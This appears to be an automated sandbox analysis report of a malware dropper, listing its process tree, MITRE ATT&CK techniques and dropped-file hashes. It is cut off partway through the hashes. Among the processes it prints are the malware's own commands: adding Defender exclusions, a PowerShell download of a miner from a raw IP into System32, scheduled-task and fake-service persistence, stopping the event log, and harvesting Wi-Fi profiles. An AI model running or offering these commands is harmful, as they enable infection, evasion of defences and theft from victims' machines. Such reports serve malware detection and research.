C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1088

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2860

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2916

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3452

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3544

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
2⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3192

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
3⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fbfdab58,0x7ff9fbfdab68,0x7ff9fbfdab78
4⤵
PID:3008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:2
4⤵
PID:1244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:3044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:4476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:1
4⤵
PID:4604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:1
4⤵
PID:4848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:1
4⤵
PID:2840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4028 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:4836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4564 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:4032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:5084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:5052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:2996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4772 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:4304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4832 --field-trial-handle=1824,i,17417903845242637425,2026068046702962478,131072 /prefetch:8
4⤵
PID:1212

C:\Users\Admin\AppData\Local\Temp\a\riff.exe
"C:\Users\Admin\AppData\Local\Temp\a\riff.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "riff" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\riff.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\riff.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\riff.exe"
4⤵
PID:1212

C:\Windows\system32\chcp.com
chcp 65001
5⤵
PID:3176

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
- Delays execution with timeout.exe
PID:2604

C:\Windows\system32\schtasks.exe
schtasks /create /tn "riff" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\riff.exe" /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:1132

C:\Users\Admin\AppData\Local\RobloxSecurity\riff.exe
"C:\Users\Admin\AppData\Local\RobloxSecurity\riff.exe"
5⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3476

C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\tor-real.exe
"C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\tor-real.exe" -f "C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\torrc.txt"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3112

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:452

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
6⤵
PID:2608

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:4904

C:\Windows\system32\netsh.exe
netsh wlan show profiles
7⤵
PID:2604

C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
7⤵
PID:3728

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
6⤵
PID:4964

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:2952

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
7⤵
PID:3352

C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
7⤵
PID:1832

C:\Users\Admin\AppData\Local\Temp\a\kano.exe
"C:\Users\Admin\AppData\Local\Temp\a\kano.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4776

C:\Users\Admin\AppData\Local\Temp\a\UAC.exe
"C:\Users\Admin\AppData\Local\Temp\a\UAC.exe"
3⤵
- Executes dropped EXE
PID:3168

C:\Users\Admin\AppData\Local\Temp\a\mdll.exe
"C:\Users\Admin\AppData\Local\Temp\a\mdll.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5112

C:\Users\Admin\AppData\Local\Temp\a\S1.exe
"C:\Users\Admin\AppData\Local\Temp\a\S1.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3696

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3896

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4072

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4052

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4540

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3368

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:624

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4400

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:1136

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:4652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4504

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1020

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:5068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://45.67.229.122/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:1428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'
2⤵
PID:1228

C:\Windows\SysWOW64\msdr.exe
"C:\Windows\System32\msdr.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:2240

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:2996

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3664

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:5808

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
4⤵
PID:2836

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1064

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
4⤵
PID:1228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1588

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
4⤵
PID:2432

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2952

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
4⤵
PID:1544

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2248

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
4⤵
PID:4332

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
4⤵
- Launches sc.exe
PID:4796

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4044

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
4⤵
- Launches sc.exe
PID:4964

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5572

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:5460

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
4⤵
- Launches sc.exe
PID:720

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2564

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5224

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5960

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:5432

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6060

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:4764

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:5420

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6100

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:5412

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6068

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:5400

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6076

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:5384

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6088

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
PID:5364

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
PID:5308

C:\Windows\system32\dialer.exe
dialer.exe
2⤵
PID:6124

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Filesize
20KB

MD5
de1e4e6a4dfe3480e0b614d38ac6a9bc

SHA1
ad8b7650b262b68f565038e78638a5122288e0af

SHA256
c508081d3b554f97b1d6fe076808652b9ae7eda04d6ec84cab949e5763ffe546

SHA512
f958d009f56646bb906145345a34a14d06d3d8cc50f0264fed3fd2d135435813d9125fd81e6b6553d1ac4883b672e9d6b1d7cfae1b7d10097d9797c4e10bff22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
356B

MD5
05670f3d85fc27f864823e7020efbbd1

SHA1
bc7be9c4c4fe172db9e75a2d68008e5fe3750271

SHA256
53825c8c8bd2d02fa657914e35a05bcd536a9e9410ef633d1586c0149dce084c

SHA512
95ca9b6e10aab1caf6cbbc284b268c869cb3611c8e2c8ade7b0ec987bd9e767b419fd3c299a01849b2d9e2d75a9288390d5e2baef8df2be37b8d64f13c3f74be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
4429cae64df647d2c4d6e74c33244f55

SHA1
ed54c38814c1cacd94ceff542abb9bdd82b193cc

SHA256
3572a8b44db3c8cd999b15416e09b2ad7895c5c9a5d79027ab8084303c315f92

SHA512
ff7d4c9be027779217ffab696bf00a4ce23fbe3f885a34a22498081bd457d1845b13dcc764bd34ef0b33f7cfa1de5b8f6b32e4cf0d8a6829d0da24c919e534c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
16KB

MD5
904a4a3f98d15587cc4b920aa35d89f2

SHA1
25f4514aad3fd1e22a0d81ade6a5823d9106374b

SHA256
c2758f4c70a157cde4d6dbef0d7ec120a3604c146bcb0a84bae4cb9cb782d7bc

SHA512
2f854da94a14656ea34089d70e60443a02a4ee2f3d350f11fc3e2ebf26414f9e661c8e354a19516d832ae3f6dae6fb93c16e3714a4ceeeba27d10fcac7288837

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
257KB

MD5
dcb680b4d239c562d4fa365956a0ba68

SHA1
b4971f21799cc9d37e990aed3bb0ee6dca9a959b

SHA256
344b63faa6865a09430c0cb43aa49ef5879a6ba511fcd376ac42e7b6e1a15398

SHA512
c4d38ebae95f2481886ced159f861688dcf7e09ec0d16dcd40ede65c7d2cf007a26c1069fe513e4deb68c3cfc22f29e238ce55406c5fd1ada851a869c783934a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
261KB

MD5
14defa509fc8f514d7e35a85a019aa80

SHA1
4c2eb02f99a82b6cc8696dec8433dd758984a7d9

SHA256
443f77aa832c5e8a2119ca1f9fc4ee84f628fbfc976a867812939c4a6357119d

SHA512
2b3796e39825a6ee9c821634484ac3011155e6b6b2ae352bc3e016445219a11889ff13ee64755344a7dff81f3322533c01a9e00306c7225472504324ab47d011

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
91KB

MD5
c3daa806399bfa75689c7207fc360e7f

SHA1
c84a23b539a4f55f817a033ba1ff4332b107ca36

SHA256
22764ecfc75ce21a1caf9c0fa3eca5ca2ff558f5bf43b00c9c7fffa28b65b94b

SHA512
b001d96d12ec994fb8229392dc724754fdf3a3975740d5fe039c02da20ba11263d24c438540d0752681b2328854f239cda77c33af00a870636c64cf343c98d16

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5968a3.TMP
Filesize
88KB

MD5
f0c9ff30670a058ac0ace6ede10e500d

SHA1
045f19fb419ad5c2a44e78f0b8739f9ea382fb1e

SHA256
c8cd531a661e8e8607ca254c9cfd4a5f1bedf0101ace2d2ad2a822cd87f75a3e

SHA512
2e95f8c23e8457a411898510368aeaa7b9736320c8b47f9a1cd105ec7502c09a346da5ab36e270eb986a6e6fca80e2bb2f8a932fb9a70aa610895f30c294512e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\riff.exe.log
Filesize
1KB

MD5
fc1be6f3f52d5c841af91f8fc3f790cb

SHA1
ac79b4229e0a0ce378ae22fc6104748c5f234511

SHA256
6da862f7c7feffca99cd58712ece93928c6ca6aed617f5d8c10a4718eaa2a910

SHA512
2f46165017309ee1a0c1b23e30a71e52e86ad8933e2649bf58c3f4628c5aa75659f5b8f6be32c2882f220b2f3ff2fd50d8766bf0a3708c94c2c634c051a05ea6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
10eaa1081d0f53131f16f4052ad0df5c

SHA1
cee56aa88b167ffc3277a4273a223375457014e4

SHA256
554528b3ea724219db2fd587915d393561b9c384b6132a1043b79961385f939c

SHA512
e3ce5bee91311543e09dec4504a6b530a526165229d6a0ab81817866b2a3d37dbc2f21fcf42302c1dd47ea86b18715577ae90ca0372c09a30e5481b793b83973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
07fc33891fec7c5c1ae336a5fc5c6b38

SHA1
b84009ed89a090eb7564ecf5f69438b40beec94a

SHA256
bcda0a9843201fb450f96134446c4201959f151dea1d0cc2fb39da6c0eb3fd03

SHA512
a00b523ab85dffb3a35774701d0133783b9052d06c79bfe2adcd2a43c0751445695317796500975dd9f70ca33928756c2ff9f990b6f90bb47cb1c55b8b06edd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k1rk1mec.oj3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\S1.exe
Filesize
740KB

MD5
db4468bcb2b2a4831714f107451eebfd

SHA1
ae9c4fd9a9602a079366fc939dcb855d79b85582

SHA256
ac1cb4f0374e4b3d51174dc6b1546430c5202d9e34ad7ab2d7dc94fc69e4597b

SHA512
b5893bfd5c1c70ab5b74d6966eb1509f5b19935a3ca1732dafe2f2000af64b83fb5849d61e525a4233364f5d99219a3cf5b876d0f7833c6145cabb1ecdf3b8cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\UAC.exe
Filesize
96KB

MD5
